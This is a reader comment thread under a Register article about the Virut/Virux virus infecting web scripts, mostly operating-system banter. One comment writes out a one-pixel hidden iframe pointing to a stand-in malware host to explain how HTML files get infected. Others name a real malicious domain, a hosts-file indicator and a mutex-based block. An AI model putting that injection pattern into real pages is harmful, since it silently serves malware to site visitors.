New Windows virus attacks PHP, HTML, and ASP scripts Researchers have identified a new strain of malware that can spread rapidly from machine to machine using a variety of infection techniques, including the poisoning of webservers, which then go on to contaminate visitors. The malware is a variation of a rapidly mutating virus alternately known as Virut and Virux. It has long …
As usual, only certain users of a certain operating system from a certain large North-American vendor are at risk. No offense to those who got their computers infested with winlogon.exe or explorer.exe in the first place but they should take better care of their systems.
Please lower your flamethrowers while I put on my flame retardant underwear.
IT is all becoming .... well, I was going to say Relatively Easy to Create, Administer and Drip Feed a Gravitational WAIVE*/an AI Phormation with Injections of Random Arbitrary Spontaneous Third Party CodeXXXX Information/Beta Intelligence into Programs and ProgramMIng [which may only subjectively, because of its Sublime Transfer/Virtual Wresting of Control and Power from one user hosting source (a Former, which in this case would be Windows and/or Microsoft) to another user hosting source (a Lien, which in all cases can be crippling and/or overwhelming intrusion/hostile takeover/underground makeover), be labelled Malicious], but IT is even Simpler than that.
I wonder when Microsoft are going to try and do their Funky/Chicken Thing .... Embrace, Extend and Extinguish ...... with IT? Or whether they realise that the tables have been turned and they have a Real Virtual Problem which hasn't/won't go away, you know ..... to paraphrase another hostile takeover/underground makeover merchant.
To do nothing is neither a Real nor a Virtual Option they can afford....... which is QuITe a Novel dDevelopment in Red Team Vulnerability BetaTesting .... a Code Crack clearing a Systems Hack clearing a Launched Attack on MetaDataBanks/Currency and Media Servers/NeuReal Organs for Binary Reality Movement .......... Future Perfect Progress, CyberIntelAIgently Designed and FailSafe Secured.
*Web Accessible Initiative with Virile Episodes. ...... Virals and VXXXXines, Custom Made to Measure.
OMG U R 2 DUM!!!1
Nah, just kidding. I stopped browsing as Admin a long time ago. If I could get my wireless network working in openSUSE I wouldn't have Windows.
It seems that there is nobody who would help someone who's never done it before, though, and I'll have to trawl through forum after forum of "OMG STFU NOOB GO BAK 2 WINDD0S" posts before I get somewhere.
Unfortunately, i've spent more time researching this issue than I spend rebuilding Windows after an attack. That's possibly the largest stumbling block "Linux on the desktop" faces.
Who's there? the scanning gateway.
Junk like that doesn't even make it past this machine in my network, which sits just behind the router.
Problem solved before it even becomes one. Of course that could be a problem for people in home situations, because machines like that (Astaro, SonicWall, big muscle custom made layer 7 packet scrubber servers for many users, etc) cost a pretty penny.
For smaller wallets have a look at http://www.untangle.com, or perhaps Yoggie over at http://www.yoggie.com/
Just to name two options for simple home use.
is also able to infect web scripts based on languages such as PHP, ASP, and HTML.
????? HTML ?????
are you sure?
Are they actually saying their is a security exploit using HTML and only HTML that can infect a web server? if so which web servers are effected?
I'm confused more information if you please.
I don't see any mention (or anything that implies) that this only infects Windows Servers. Or by trying to make a reference to Red Hat - i.e. PNAELV ?
Yes it only infects Windows desktops, but there is no suggest that it is so picky about the servers it chooses.
>> Please lower your flamethrowers while I put on my flame retardant underwear
Surely you mean climb out from under your bridge and set your table?
"What the poster forgot to mention....was that funnily enough cross platform code execution isn't actually possible.
Like duh" ..... By Death_Ninja Posted Thursday 12th February 2009 10:36 GMT
Death_Ninja,
That post is ambiguous. Would you care to clear it up with something definitive with regard to the possibility of cross platform code execution? Is it or is it not possible?
If all the thing is doing is searching for accessible and editable files that will be served as HTML from a server and inserting <iframe width=1 height=1src="whereIhostmymalware.com">, then yes, plain HTML files will be as vulnerable as those which include scripting. Don't even have to be on a server, in fact - HTML opened locally in a browser will do the job too.
Hi Ash,
One of the main reasons I switched to Ubuntu from Gentoo/Debian/SuSE (I've tried a few, what can I say??!!) was because my wireless just worked.
The more I think about it the more it pains me to say it, but Ubuntu is rapidly becoming the operating system with all the "ease of use" of windows without the malware and virus crap.
/me wonders if the next virus to hit Linux will be aimed @ ubuntu...
Anon.
Just read the MS and TM blog posts, am I right in believing that this virus can only infect locally stored PHP scripts that could potentially be uploaded to a server, or can this virus run multiple exploits against PHP and thereby infect servers that are visited by an infected machine?
That level of "help" on Linux forums is precisely why I know dozens of people who have given Linux of various flavours a try, and then returned to Windows. They're generally above-the-average level for Windows home users - quite comfortable settings up home networks or tweaking for performance gains etc. To them, asking a reasonable enough question for a new user of a product, to be shouted down with nonsensical abuse by "the elite" (who sound like 13yo's writing text messages) is enough to make them say "Fuck that for a lark".
Say what you like about Windows, but generally speaking, the majority of "help" areas for home users are at least somewhat helpful, and don't just take the piss out of a new user for not being instantly familiar with the intricacies of unfamiliar, and often quite daunting, tasks.
"rapidly mutating virus" is just wrong. Mutation in nature is an uncontrolled process which usually leads to the mutated organism being damaged or even non-viable. True mutation in software might come about by some kind of corruption such as a disk read or write error, but this would also very likely stop the software working at all, and is nothing to do with what the author means when he uses the word in relation to viruses. Such use is misleading.
Further reading reveals that what the author is describing is "new polymorphic tricks" which are not mutation but simply code routines in the virus that vary the way it it appears from one instance of infection to another. This is entirely in the control of the writer of the virus, not a mutation brought about by a random event. The virus code remains the same, including the carefully designed part that paints the virus' face anew for each infection.
Talk about a virus "fingerprint" is also misleading. Viruses do not have fingerprints (nor "signatures") in the way that people do. Different virus researchers and their AV software will use different search strings (the non-misleading term) and other techniques to identify viruses. There is no one "fingerprint" or "signature" that is relied on by everyone in the way implied by these terms.
The polymorphism makes the use of such search strings difficult, as the virus must be decrypted before they can be applied, and both the encryption and the virus' own decrypting stub (necessary for the virus to decrypt its own code to run it) vary from one instance of the virus to the next. Techniques to identify such viruses reliably are therefore complex, but no mutation is involved.
As @AC 10:25 above says, HTML???
How does it infect stuff? What are the vulnerabilities? If I forbid IFRAMES with noscript is that the cure? Does it needs JS (which I block)? Does it rely on plugins like flash (that I never use) or can it manage without?
Or does it try to break stuff at a lower level which the browser can't catch?
And as one of your links says: "Win32/Virut creates a mutex named VT_3 which it uses to prevent multiple copies of itself from running on the host system" then perhaps a trivial script which takes and holds a same-named mutex would be a pretty effective hack at blocking it as a short term measure.
Not enough info!
Unleash the flaming dogs of war on me, but I'm going to go ahead and make the observation that the choice of OS is not limited to Winblows or Linux. Winblows is. . . .well .. . .. .Winblows, so it's obvious why you wouldn't want to use it. Linux is powerful, but as several people have mentioned it doesn't seem ready for the masses, and online message boards leave you with the fear of getting gang raped if you ask any questions. So what is a person to do? If only there was an OS that was very easy to use . . . it "just worked" . . . and it also had the power of certified Unix under the hood. . . . .if only . . ...
Sorry if that sounded sarcastic, it wasn't intended that way. Just thinking out loud that there is an alternative that combines the best of both worlds.
Below is just part of the installation instructions for Doom 3 on Ubuntu. I don't think anything else has to be said re: Windows/Ubuntu/Users. But others will no doubt continue to say many things.
Installation of the Linux binary
The installation writes to /usr/local/games/doom3 by default. You should install using sudo to ensure write permissions to /usr/local/games/doom3, and make sure that the installation file is executable.
chmod +x doom3-linux-x.x.xxxx.x86.run
sudo ./doom3-linux-x.x.xxxx.x86.run
# As of 2008-03-19 this is:
sudo ./doom3-linux-1.3.1.1304.x86.run
Add the missing files
The following files need to be copied from the win32 install CDs to your base/ directory. by default, /usr/local/games/doom3/base
base/pak000.pk4
base/pak001.pk4
base/pak002.pk4
base/pak003.pk4
base/pak004.pk4
# On Ubuntu 7.04, you can find these by inserting discs 1-3 one-after-the-other
# and then doing, for each disk:
sudo cp /media/cdrom0/Setup/Data/base/pak00*.pk4 /usr/local/games/doom3/base
Ok - while i would also like for the 'smug ubuntu' user icon as well, there is one important thing that has not been addressed: if this virus/malware is capable of getting to executable code, and since the CPU instruction set is the same for the IBM clone PC, is this virus limited to just the windows OS?
As for those of you who state that getting advice for new comers to Linux/Ubuntu - you are totally wrong. Simply use the IRC chat channel to ask your questions and there are very decent folk there that will help you. Any form of noob bashing is a big no-no on many ubuntu forums!
Fred: "As for those of you who state that getting advice for new comers to Linux/Ubuntu - you are totally wrong."
Erm, no, not *wrong*. Maybe the users in question (who are, to be fair, not "tech-heads", but are basically pretty competent as home users go) went to the wrong place (AFAIK, they Googled the issue they were having and clicked the links) - but they definitely did come out with a bad impression of the community (I won't repeat verbatim their comments!), and were thus quite discouraged from progressing any further.
I've made a note of the locations mentioned by the 3 of you above (visible at this time), and will pass them to anyone who mentioned similar issues in the future.
B - "if only...." they weren't £x00 more than the price of a comparable-spec PC...! (just priced up: £700 for an iBook, £400 for a higher-specced (RAM, HDD & processor all higher) Toshiba laptop...) - there's a credit crunch on y'know!! ;-)
Can we just have more real conversations with less continual flaming and inanities? Some real dialogue? Please.
Many of us are starting discontinue reading the comments because there is just more and more unsubstantial comments making it a waste of time trying to find constructive data from the real info sec professionals who might be posting and/or reading The Reg's articles.
Thx,
PWA - MSIA MBA CISSP-ISSEP
That was a nice clear post, "Not mutation", Apocalypse Later ....[Posted Thursday 12th February 2009 12:55 GMT]
Very Succinct and Instructional.
And man, is that "Techniques to identify such viruses reliably are therefore complex,..." one Mother of an Understatement. Some might posit that such necessary techniques do not exist...... which is good news for those flogging virus protection? :-)
Where have you people been looking for help, I wonder?
OK, I suppose you have googled for something and clicked on links. I've been using Linux for more than 8 years now, and I google (or whatever it was I did before) all the time for help on many things both OS and app-related. Have rarely seem the (in)famous responses you guys mention. Many times the responses are too technical for a newbie or whatever. But rarely they are as you mention. They DO exist, but are very minority as far as I've seen. Have I just been lucky all along?
Maybe ye are just delicate flowers that get scared by a few posts from the inevitable arrogant idiots to be found everywhere (not just software communities)?
Seen it a few times in the past week, the giveaway is in the hosts file: "127.0.0.1 zeif.pl" at the top. Lockups, slow performance, script and Internet problems, occasional virus alerts....
And the fact that every ruddy .exe and .htm is infected when you scan the disk from another uninfected pc. No live-CD trojan removal here, full format and reload I'm afraid. Bloody nightmare.
It even tried spreading to my network install drive (which is now most definitely read-only) and my USB stick.
@Ash
Try Ubuntu. I've installed it on several laptops with different wireless cards and it has always worked out of the box.
Re: Online support. Again, with the Ubuntu plug, but their support forums are nothing like that. I participate in the "Absolute Beginners" forum occasionally when I'm bored and I have yet to see the behaviour you and others describe. The mods there do a pretty good job and people there are generally keen to see newbies succeed.
@Apocalypse 14:42 GMT "Below is just part of the installation instructions for Doom 3 on Ubuntu."
Let me get this straight... you are trying to install a *windows* version of a game (the instructions specifically mention the Win32 install CDs) on a Linux machine - which requires patching some of the game's executables/libraries - and you are complaining about the complexity of the instructions? Let me guess - you're the kind of person who think that modifying a ULP car engine to run on diesel simply requires changing the nozzle you use at the pump, right?
Geez. Can we have a Luser icon? This is why I left Support as soon as I could - perfectly rational people somehow have their brains switched off as soon as a computer is involved in the "problem".
I followed a link I'd missed before in the article (oops) and got some useful info. <http://securitylabs.websense.com/content/Blogs/3300.aspx> mentions that the page you're redirected to has some javascript (weirdly obfuscated in a way I've not seen before; can anyone explain?).
So, it looks like blocking JS will block the exploit. Request to author of this article - make this clear in future.
Matt, as you're one of the few not posting about ubuntu here, what do you reckon to the 'grab the mutex first' suggestion. In fact, if the users are running as users not as admin, would that be enough to stop it, ye reckon?
And the sooner we get to some intelligent, fine grained control of browsers' scripting, the better. Why should xmlhttprequest be on by default.
Disclaimer: I'm not a web developer. This may be obvious.
The issue Ash is referring to is actually caused by Microsoft Trolls polluting Linux support groups. I can probably finger a few posters in this thread of being guilty of this practice. Yes, you know who you are.
There's one particularly sad individual who inhabits the unbuntu and advocacy groups, who amongst other things has claimed to be a kernel hacker, yet has been show to have actually never run Linux from their lack of knowledge. All he does is use foul language and insist Microsoft is better, whilst claiming to have hit x number of Linux issues, all of which are generally shown to be either made up, or a willingly obtuse issue like the Doom install above, found by googling.
I'd probably find it amusing, if wasn't part of an orchestrated campaign ( yes boys, it is, we've all read the docs Microsoft wanted buried in Comes V Microsoft, so don't bother tinfoil hat comments), that is ultimately is aimed at making sure that I don't have the freedom to install whatever operating system I want on the hardware I own.
On the Doom issue above, as Neoc points out it is a hack created to allow a win game run cross platform - here's a hint to Mr Later - try installing UT2k4 on a linux distro from that time - you'll probably find the install script provided (with Epic's blessing) on the original DVD works first time ....
But then even Microsoft has pretty much given up on PC gaming, even cutting FS - there's just no profit in it compared to the consoles. Then what do you really need Windows for in the home? After all, if your a Microsoft fanboi you'll already be browsing the web and downloading your movies via your Xbox 720...
Amen to that! I seem to remember posting something similar myself - but perhaps I just typed it out and closed the window in a huff ...
@amanfrommars - The post you congratulated is exactly the kind of thing that is interesting to read. Perhaps you could also start thinking through your own posts a bit more in future ...
"@amanfrommars - The post you congratulated is exactly the kind of thing that is interesting to read. Perhaps you could also start thinking through your own posts a bit more in future ..." ... By Anthony Posted Friday 13th February 2009 15:49 GMT
Certainly, Anthony, if that us what is needed to get one thinking/understanding how the future is easily delivered and who would currently think that they are delivering it...... albeit shockingly badly, then I am only too pleased to oblige.
You may like to consider though, the convenience in racing way ahead, preparing the ground and then travelling back to better and more clearly explain where we will then be going.
I am however ever very mindful of the fact that GOD* Concepts and Virtualisation in Cloud Cover are not likely to be readily and easily accepted and/or understood, for the very simple reason that they extraordinarily render the Status Quo Intelligence Position fatally flawed and untenable, and in many cases the arguments against them are motivated not by reasoned intellect but rather more in support of ignorant protectionism of some vainglorious reputation and dodgy business model.
But my English is improving and I'm slowly getting there....... and this is what I'm into presently .... http://amanfrommars.baywords.com/ai-virtual-os/
And yes, I do realise that I have to simplify it for the masses, but currently my Phishing Interests are Geared towards the Very Top of the Global Pyramid with its Financial Levers...... for they appears to be the System's Weakest Links/Most Vulnerable Components. A View AIded Immeasurably by Systems Ignoring the Danger and thinking themselves Untouchables.
But such situations are not at all unusual. In fact they are QuITe the Norm, for how many would understand the blueprints for the Large Hadron Collider and what it can do/is going to do and the implications in what it is discovering?
Crikey, one only needs to consider the Internet which has transformed Society and Intelligence and which is an Intangible Untouchable without any Physicality and thus a Virtual Reality dDelivered and Perceived 42BReal.
Humans can be SMART but never if they do not use their brains because they choose not to think about what is happening elsewhere else around them. Not everybody confines themselves to the lowest common denominator.
*Global Operating Device.
"The iframe surreptitiously directs visitors to zief.pl (don't visit it unless you're a security professional)"
What I want to know is why someone isn't busting down the door of whoever owns the "zief.pl" domain and hauling the bastard(s) off to some suitably horrible prison in a 3rd world country where torture is allowed. But apparently the relevant authorites don't give a rat's ass about internet crime otherwise they'd put a stop to such things. Vigilantes anyone? ;)
"Many of us are starting discontinue reading the comments because there is just more and more unsubstantial comments making it a waste of time...."
Oh, darn, and I was just starting to get the hang of Reg-accepted disgusting obscenities and allowable swear-words (anything goes) and off-topic flaming and such ;)
But, you're right, of course (seriously). The seedy stuff turns a lot of people off. Something else for the Reg to consider, is the *advertisers* - if I was running a company looking for adspace, I would absolutely *not* advertise on these pages because it would put my company in a bad light. Maybe this website should run ads for public threesomes and flourescent condoms and such, it would be more appropriate to some of the stuff I've read here.
"if I was running a company looking for adspace, I would absolutely *not* advertise on these pages because it would put my company in a bad light." .... By Anonymous Coward Posted Saturday 14th February 2009 20:57 GMT
Lord save us from the nanny state protecting puritanical franchises with immoral self serving indignation. And also save us from companies offering useless merchandise.
AC,
I thought most came here to learn of the Future, not to support and/or put your company in a bad light, which of course would be your doing if you were in charge.
El Reg must be doing everything right if they are now to be so nicely attacked over adult morals, which are at best, a subjective indulgence rather than an objective improvement.
But all are surely welcomed here, for all have a valid enough right to their views, based as they are upon their own particuliar and peculiar, unique education. Everybody's World View is Uniquely Phormed by the Store in their Head of what they learnt and/or XXXXPerienced...... and therefore is the World Uniquely Different to Everybody.
And the friendly irreverence/Banter and Craic here on El Reg is a welcome break from the holier than thou attitude which so many professionals experts and/or arrogantly blind and short sighted idiots can display.
And there are also some very SMART Fellows Floating some Real SP00Key Cloud Initiatives here too which will pay El Reg more ably than any advertiser will ever be able/or be inclined to do.
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2024
